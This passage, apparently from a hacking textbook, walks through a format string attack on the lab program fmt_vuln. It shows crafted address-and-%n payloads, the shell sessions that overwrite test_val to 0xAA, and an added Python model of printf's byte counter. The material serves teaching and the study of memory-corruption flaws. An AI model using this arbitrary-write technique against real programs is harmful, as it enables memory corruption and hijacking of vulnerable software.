The last %x format parameter uses 8 as the field width to standardize the
output. This is essentially reading a random DWORD from the stack, which
could output anywhere from 1 to 8 characters. Since the first overwrite puts
28 into test_val, using 150 as the field width instead of 8 should set the
least significant byte of test_val to 0xAA.
Now for the next write. Another argument is needed for another %x
format parameter to increment the byte count to 187, which is 0xBB in
hexadecimal. This argument could be anything; it just has to be four bytes long
and must be located after the first arbitrary memory address of 0x08049754.
Since this is all still in the memory of the format string, it can be easily
controlled. The word JUNK is four bytes long and will work fine.
After that, the next memory address to be written to, 0x08049755, should
be put into memory so the second %n format parameter can access it. This
means the beginning of the format string should consist of the target memory
address, four bytes of junk, and then the target memory address plus one.
But all of these bytes of memory are also printed by the format function,
thus incrementing the byte counter used for the %n format parameter. This is
getting tricky.
Perhaps we should think about the beginning of the format string ahead
of time. The goal is to have four writes. Each one will need to have a memory
address passed to it, and among them all, four bytes of junk are needed to
properly increment the byte counter for the %n format parameters. The first
%x format parameter can use the four bytes found before the format string
itself, but the remaining three will need to be supplied data. For the entire
write procedure, the beginning of the format string should look like this:
0x08049794 0x08049795 0x08049796 0x08049797
94 97 04 08 JUNK 95 97 04 08 JUNK 96 97 04 08 JUNK 97 97 04 08
Let's give it a try.
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\x96\x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%8x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%8x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3c0b7fe75fc 0
[*] test_val @ 0x08049794 = 52 0x00000034
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xaa - 52 + 8"
$1 = 126
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\x96\x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%126x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3c0b7fe75fc
0
[*] test_val @ 0x08049794 = 170 0x000000aa
reader@hacking:~/booksrc $
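To see exactly where the 52 and the 170 in the session above come from, here is an added Python model of printf's output-byte counter. It is not code from the book or from fmt_vuln; it never calls printf, it only counts the bytes each piece of the format string would produce. The prefix bytes and the three stack values (0xbffff3c0, 0xb7fe75fc, and 0, taken from the session output) are constructed inputs; the assumption that %x pads to the field width but never truncates is standard printf behaviour.

```python
"""Model of the byte counter that a %n conversion stores.

Added example, not part of the book. It reproduces the arithmetic of the
session: a 28-byte prefix plus %x%x%8x gives 52, and widening the last
%x to 126 (0xaa - 52 + 8) gives 170 = 0xAA.
"""
import re

# Constructed from the session above: four 4-byte addresses separated by
# three 4-byte "JUNK" fillers, 28 bytes in total. Kept as bytes because
# the address bytes are not printable text.
PREFIX = (b"\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK"
          b"\x96\x97\x04\x08JUNK\x97\x97\x04\x08")

# Values the three %x conversions consume, as printed in the session.
# Assumption: the third DWORD is 0 (it printed as "0").
STACK_WORDS = [0xbffff3c0, 0xb7fe75fc, 0x0]

# Only the two conversions the passage uses are modelled: %<width>x and %n.
SPEC = re.compile(rb"%(\d*)([xn])")


def count_output(prefix: bytes, fmt: bytes, words):
    """Walk fmt and return (total_bytes, values each %n would store).

    Every byte the format function emits, including the prefix and any
    literal text between conversions, advances the counter; %n itself
    prints nothing and just records the counter at that point.
    """
    count = len(prefix)          # the prefix is printed before the conversions
    writes = []
    args = iter(words)
    pos = 0
    for m in SPEC.finditer(fmt):
        count += m.start() - pos  # literal text between specifiers
        pos = m.end()
        width = int(m.group(1)) if m.group(1) else 0
        if m.group(2) == b"x":
            text = format(next(args), "x").encode()
            # A field width pads short values with spaces; it never truncates,
            # which is why a random DWORD prints anywhere from 1 to 8 characters.
            count += max(width, len(text))
        else:
            writes.append(count)
    count += len(fmt) - pos       # trailing literal text, if any
    return count, writes


def width_for_target(target: int, count_now: int, width_now: int) -> int:
    """The gdb arithmetic from the session (0xaa - 52 + 8 = 126):
    how wide the last %x must be for the counter to land on target."""
    return target - count_now + width_now


def least_significant_byte(value: int) -> int:
    """The byte a one-byte-at-a-time write actually cares about."""
    return value & 0xFF


if __name__ == "__main__":
    total, stored = count_output(PREFIX, b"%x%x%8x%n", STACK_WORDS)
    print("with %8x:   bytes =", total, "-> %n stores", stored[0])
    w = width_for_target(0xAA, stored[0], 8)
    print("needed width:", w)
    total, stored = count_output(PREFIX, b"%x%x%" + str(w).encode() + b"x%n", STACK_WORDS)
    print("with %%%dx: bytes = %d -> %%n stores %d (0x%02x)"
          % (w, total, stored[0], least_significant_byte(stored[0])))
```

Running it prints the same 52, 126 and 170 (0xaa) that the session shows, and makes the point of the passage concrete: the 28 prefix bytes are counted just like the %x output, so any change to the front of the string has to be folded into the field-width arithmetic.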